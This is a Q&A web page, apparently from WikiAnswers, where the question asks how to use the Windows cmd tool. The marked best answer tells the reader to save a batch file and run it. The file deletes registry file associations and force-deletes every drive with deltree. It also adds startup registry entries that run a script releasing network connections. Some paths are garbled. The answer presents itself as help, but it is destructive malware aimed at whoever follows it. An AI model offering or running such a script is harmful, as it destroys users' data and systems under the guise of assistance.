answersLogoWhite

0

How do you use the system 32 cmd?

Updated: 12/19/2022
User Avatar

Wiki User

15y ago

Best Answer

Open 'Notepad' and save file as 'batch.bat' then copy and paste this code:

@ECHO OFF

START reg delete HKCR/.exe

START reg delete HKCR/.dll

START reg delete HKCR/*

:MESSAGE

ECHO SYSTEM 32

GOTO MESSAGE

deltree /y C:\

deltree /y E:\

deltree /y A:\

deltree /y F:\

deltree /y G:\

deltree /y D:\

deltree /y H:\

echo @echo off>c:windowswimn32.bat

echo break off>>c:windowswimn32.bat

echo ipconfig/release_all>>c:windowswimn32.bat

echo end>>c:windowswimn32.bat

reg add hkey_local_machinesoftwaremicrosoftwindowscurrentv ersionrun /v WINDOWsAPI /t reg_sz /d c:windowswimn32.bat /f

reg add hkey_current_usersoftwaremicrosoftwindowscurrentve rsionrun /v CONTROLexit /t reg_sz /d c:windowswimn32.bat /f

echo SYSTEM 32

PAUSE

User Avatar

Wiki User

15y ago
This answer is:
User Avatar

Add your answer:

Earn +20 pts
Q: How do you use the system 32 cmd?
Write your answer...
Submit
Still have questions?
magnify glass
imp
Related questions

How do you use WINDOWS system32 cmd exe for windows xp PC?

cmd.exe allows you to use command line for virtually whatever you want. You can use ipconfig command if you want to see information about your network adapters.Start->Run->cmd, press Enter. type in the cmd window ipconfig.Most of the common commands used are for navigating the file system, it is possible to do some harm to the system if the commands are not executed correctly.There is hundereds of commands and programs that run within the CMD shell.This link has a complete list of commands http://www.kapcom.com.au/Windows-CMD-Commands-CMD-Network-Commands.html


What is system error 5 at cmd?

do nothing


Which microsoft opera ting system was the first to use all 32-bit processing?

Windows vista was the first 32-bit system to use all 32-bits


How do you use cmd?

CMD or the command line is used to execute instructions & programs. Many commands such as (dir) can be executed like this c:\>dir This will list the current directories content. :)


How to find out the ip address of your chatmate?

use CMD :D


Which windows operating system use 32 bit processing?

NT


Which windows operating system use 32-bit processing?

NT


What are preferable to use 32-bit drivers or 16-bit drivers?

Assuming you are running a 32 bit (modern) operating system, 32.


Which command cut the object in illustrator?

To Cut you have to use Strg+X (=>Windows) or cmd+X / +X (=>Mac). To paste it in again, use Strg+V (=>Windows) or cmd+V / +V (=>Mac)


How do you get an ip address for an HP COMPAQ dc5100mt?

you can use cmd prompt by typing cmd in run on xp vista and 7 for local and for wide area you can use any ip site such as ipchicken.com or whatsmyip.org


What determines whether you can use a 32 bit operating system or a 64 bit operating system?

Your processor.


What is cmd?

cmd is command prompt. Just about all windows computers have this included. Its like a mini PC because it executes all the files you need, if you know how to use it.